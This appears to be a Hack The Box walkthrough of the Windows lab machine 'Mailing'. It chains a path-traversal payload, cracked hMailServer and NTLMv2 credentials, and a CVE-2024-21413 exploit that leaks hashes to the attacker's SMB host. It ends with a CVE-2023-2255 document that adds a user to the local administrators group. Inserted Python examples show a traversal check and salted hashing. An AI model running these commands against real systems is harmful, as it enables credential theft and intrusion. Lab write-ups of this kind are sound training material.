HTB Mailing done
Mailing
OS: Windows
Technology:
IP Address: 10.10.11.14
Open ports:
25/tcp open smtp hMailServer smtpd
80/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
993/tcp open ssl/imap hMailServer imapd
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59524/tcp open msrpc Microsoft Windows RPC
Users and passwords:
Credentials for configuring the mail client:
L: user
P: password
---
From the config file C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini:
841bb5acfa6779ae432fd7a4e6600ba7
---
After cracking the hash:
H: 841bb5acfa6779ae432fd7a4e6600ba7
P: homenetworkingadministrator
---
After cracking the NetNTLMv2 hash captured by Responder:
L: maya
P: m4y4ngs4ri
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.14_nmap 10.10.11.14 ; cat 10.10.11.14_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 22:22 UTC
Nmap scan report for mailing.htb (10.10.11.14)
Host is up (0.050s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Mailing
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 NAMESPACE IMAP4rev1 CAPABILITY RIGHTS=texkA0001 CHILDREN completed OK IDLE QUOTA SORT ACL
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: IMAP4 NAMESPACE IMAP4rev1 CAPABILITY RIGHTS=texkA0001 CHILDREN completed OK IDLE QUOTA SORT ACL
|_ssl-date: TLS randomness does not represent time
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
59524/tcp open msrpc Microsoft Windows RPC
Add the IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ cat /etc/hosts | grep mailing
10.10.11.14 mailing.htb
Ffuf - http://mailing.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ ffuf -u http://mailing.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o mailing.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://mailing.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : mailing.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Download.php [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 54ms]
Index.php [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 38ms]
assets [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 39ms]
[INFO] Adding a new job to the queue: http://mailing.htb/assets/FUZZ
download.php [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 40ms]
index.php [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 126ms]
instructions [Status: 301, Size: 166, Words: 9, Lines: 2, Duration: 48ms]
[INFO] Adding a new job to the queue: http://mailing.htb/instructions/FUZZ
[INFO] Starting queued job on target: http://mailing.htb/assets/FUZZ
[INFO] Starting queued job on target: http://mailing.htb/instructions/FUZZ
:: Progress: [122814/122814] :: Job [3/3] :: 995 req/sec :: Duration: [0:02:09] :: Errors: 0 ::
Open the website: http://mailing.htb/download.php
I got the message:
No file specified for download.
Ffuf - http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc
Found a parameter: file
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ ffuf -u "http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc" -c -w /usr/share/wordlists/dirb/big.txt | grep -v "31"
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://mailing.htb/download.php?FUZZ=C:/Windows/System32/drivers/etc
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
file [Status: 200, Size: 15, Words: 3, Lines: 1, Duration: 49ms]
:: Progress: [20469/20469] :: Job [1/1] :: 1092 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
Read the hMailServer config file, hMailServer.ini, through path traversal in the file parameter.
Found the administrator password hash:
841bb5acfa6779ae432fd7a4e6600ba7
Payload: ../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini
---
Burp request
GET /download.php?file=../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini HTTP/1.1
Host: mailing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
---
Burp response
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.ini"
X-Powered-By: ASP.NET
Date: Tue, 20 Aug 2024 23:40:35 GMT
Content-Length: 604
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
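As an added example (not code from the box or from this writeup), here is the check download.php was missing, in Python: a resolver that only serves a file value that normalizes to a path inside the download root, plus a scan over constructed IIS-style log lines that flags requests like the one above. The download root C:\inetpub\wwwroot\instructions and the log lines are assumptions made for the demo.

```python
import ntpath
from urllib.parse import parse_qs

# Assumed download root for the demo; the writeup does not state where download.php
# reads from, so this path is a placeholder, not the box's real configuration.
DOWNLOAD_ROOT = r"C:\inetpub\wwwroot\instructions"


def safe_download_path(name, root=DOWNLOAD_ROOT):
    """Return the normalized path for an already URL-decoded 'file' value, or None
    if it escapes root. '/' and '\\' are both separators, as on IIS/Windows, and an
    absolute value such as C:/Windows/... replaces root entirely in ntpath.join, so
    the prefix test below catches it too."""
    if not name.strip() or "\x00" in name:
        return None
    full = ntpath.normpath(ntpath.join(root, name))
    root_n = ntpath.normcase(ntpath.normpath(root))
    # Strict prefix plus separator: "...\instructions2\x" must not pass as inside root.
    if not ntpath.normcase(full).startswith(root_n + "\\"):
        return None
    return full


# Detection side: IIS W3C fields, reduced to the ones a download.php log line needs.
IIS_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# Constructed sample log (IIS writes spaces in the UA as '+', so fields split on ' ').
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-08-20 23:40:35 10.10.11.14 GET /download.php file=instructions.pdf 80 - 10.10.14.25 Mozilla/5.0+(X11) 200
2024-08-20 23:40:36 10.10.11.14 GET /download.php file=../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini 80 - 10.10.14.25 Mozilla/5.0+(X11) 200
2024-08-20 23:40:37 10.10.11.14 GET /download.php file=C:/Windows/System32/drivers/etc/hosts 80 - 10.10.14.25 Mozilla/5.0+(X11) 200
2024-08-20 23:40:38 10.10.11.14 GET /index.php - 80 - 10.10.14.25 Mozilla/5.0+(X11) 200
""".splitlines()


def suspicious_downloads(log_lines):
    """Return (client ip, decoded file value) for every download.php request whose
    file parameter would have been rejected by safe_download_path."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < len(IIS_FIELDS):
            continue
        rec = dict(zip(IIS_FIELDS, parts))
        if rec["cs-uri-stem"].lower() != "/download.php":
            continue
        # parse_qs applies the same decoding PHP does: '+' -> space, %xx -> byte.
        for value in parse_qs(rec["cs-uri-query"]).get("file", []):
            if safe_download_path(value) is None:
                hits.append((rec["c-ip"], value))
    return hits
```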
Identify the hash type
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ hash-identifier
--------------------------------------------------
HASH: 841bb5acfa6779ae432fd7a4e6600ba7
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
..
..
..
---
Crack the hash on the website: https://crackstation.net/
H: 841bb5acfa6779ae432fd7a4e6600ba7
P: homenetworkingadministrator
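Added example, not part of the writeup: parse the hMailServer.ini returned above, confirm that AdministratorPassword is a bare 32-hex unsalted MD5 (which is why a lookup site answers instantly), recompute it from a small candidate list, and contrast it with a salted PBKDF2 record that yields a different value for the same password on every store. The candidate list is constructed.

```python
import configparser
import hashlib
import hmac
import os
import re

# Trimmed copy of the hMailServer.ini returned by download.php above (values from the page).
# The [Database] Password is marked PasswordEncryption=1, i.e. encrypted rather than
# hashed; that field is not handled here.
HMAIL_INI = """\
[Directories]
ProgramFolder=C:\\Program Files (x86)\\hMailServer
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
"""


def load_admin_hash(ini_text):
    """Read [Security] AdministratorPassword; key case is preserved on purpose."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(ini_text)
    return cp["Security"]["AdministratorPassword"].strip().lower()


def looks_like_unsalted_md5(value):
    # 32 hex digits and nothing else: no algorithm tag, no salt, no cost factor.
    return re.fullmatch(r"[0-9a-f]{32}", value) is not None


def crack_md5(target_hex, candidates):
    """One MD5 per guess; identical passwords give identical hashes, which is what
    precomputed lookup services such as crackstation rely on."""
    for pw in candidates:
        if hmac.compare_digest(hashlib.md5(pw.encode()).hexdigest(), target_hex):
            return pw
    return None


# The fix for this storage scheme: a per-record random salt and a slow KDF.
def pbkdf2_record(password, salt=None, iterations=600_000):
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(record, password):
    _, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed candidate list for the demo (the box's password is the crackstation result above).
CANDIDATES = ["admin", "password", "hmailserver", "homenetworkingadministrator"]
```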
Exploit: CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
[CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
Download the exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
Cloning into 'CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (28/28), 14.48 KiB | 593.00 KiB/s, done.
Resolving deltas: 100% (7/7), done.
Start Responder
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
...
...
...
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.25]
Responder IPv6 [dead:beef:2::1017]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-D2MI06F2IRI]
Responder Domain Name [APBU.LOCAL]
Responder DCE-RPC Port [47599]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:58f043bfa643c[...]
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
Run the exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.25\aaa\meeting" --subject "qwerty"
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]
✅ Email sent successfully.
Cracking the NetNTLMv2 hash - user maya
After cracking:
L: maya
P: m4y4ngs4ri
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ nano maya.ntlm.hash
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ john maya.ntlm.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri (maya)
1g 0:00:00:02 DONE (2024-08-21 13:13) 0.3861g/s 2290Kp/s 2290Kc/s 2290KC/s m61403..m4893019
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Log in as user maya
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: user.txt
*Evil-WinRM* PS C:\Users\maya\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> dir
Directory: C:\Users\maya\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2024 7:34 PM 2350 Microsoft Edge.lnk
-ar--- 8/21/2024 9:53 AM 34 user.txt
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
b8309d454b9cfa67ea1a71e701f23708
*Evil-WinRM* PS C:\Users\maya\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobación de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
*Evil-WinRM* PS C:\Users\maya\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1d4
IPv6 Address. . . . . . . . . . . : dead:beef::8a58:ed5f:be4d:9fa5
Temporary IPv6 Address. . . . . . : dead:beef::f03e:1f9d:615:6448
Link-local IPv6 Address . . . . . : fe80::2c8e:d7b6:324b:9a84%14
IPv4 Address. . . . . . . . . . . : 10.10.11.14
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%14
10.10.10.2
*Evil-WinRM* PS C:\Users\maya\Desktop>
Privilege Escalation
Find a vulnerable application - LibreOffice
I found LibreOffice version 7.4
---
*Evil-WinRM* PS C:\Users\maya\Documents> type "C:\PRogram Files\LibreOffice\readmes\readme_en-GB.txt"
======================================================================
LibreOffice 7.4 ReadMe
======================================================================
For the latest updates to this readme file, see https://git.libreoffice.org/core/tree/master/README.md
This file contains important information about the LibreOffice software. You are recommended to read this information very carefully before starting installation.
Exploit: CVE-2023-2255 Remote documents loaded without prompt via IFrame
[CVE-2023-2255 Remote documents loaded without prompt via IFrame](https://github.com/elweth-sec/CVE-2023-2255)
Download the exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
Resolving deltas: 100% (2/2), done.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Mailing]
└─$ cd CVE-2023-2255
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ ls
CVE-2023-2255.py README.md samples webshell.php
Run the exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exploit.odt
File exploit.odt has been created !
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Mailing/CVE-2023-2255]
└─$ cp exploit.odt ../
---
*Evil-WinRM* PS C:\Users\maya\Documents> upload /home/kali/Desktop/oscp/writeups/HTB/HTB_Mailing/exploit.odt
Info: Uploading /home/kali/Desktop/oscp/writeups/HTB/HTB_Mailing/exploit.odt to C:\Users\maya\Documents\exploit.odt
Data: 40700 bytes of 40700 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\maya\Documents>
*Evil-WinRM* PS C:\Users\maya\Documents> ./exploit.odt
*Evil-WinRM* PS C:\Users\maya\Documents>
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================================ ================ ============ ===============================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local y miembro del grupo de administradores Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administradores Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio alto Label S-1-16-12288
*Evil-WinRM* PS C:\Users\maya\Documents>
Read flag: root.txt
*Evil-WinRM* PS C:\Users\maya\Documents> dir
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 8/22/2024 11:34 PM 30526 exploit.odt
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs
*Evil-WinRM* PS C:\Users\maya\Documents> type C:\Users\localadmin\Desktop\root.txt
230a9ca959433d45dddd6d48238732ee
*Evil-WinRM* PS C:\Users\maya\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1d4
IPv6 Address. . . . . . . . . . . : dead:beef::ba80:a172:f0c9:8779
Temporary IPv6 Address. . . . . . : dead:beef::edbd:c7b4:ad5e:d70c
Link-local IPv6 Address . . . . . : fe80::b30a:816b:ad8:5c77%14
IPv4 Address. . . . . . . . . . . : 10.10.11.14
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%14
10.10.10.2
*Evil-WinRM* PS C:\Users\maya\Documents>
References
[CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
[CVE-2023-2255 Remote documents loaded without prompt via IFrame](https://github.com/elweth-sec/CVE-2023-2255)
Lessons Learned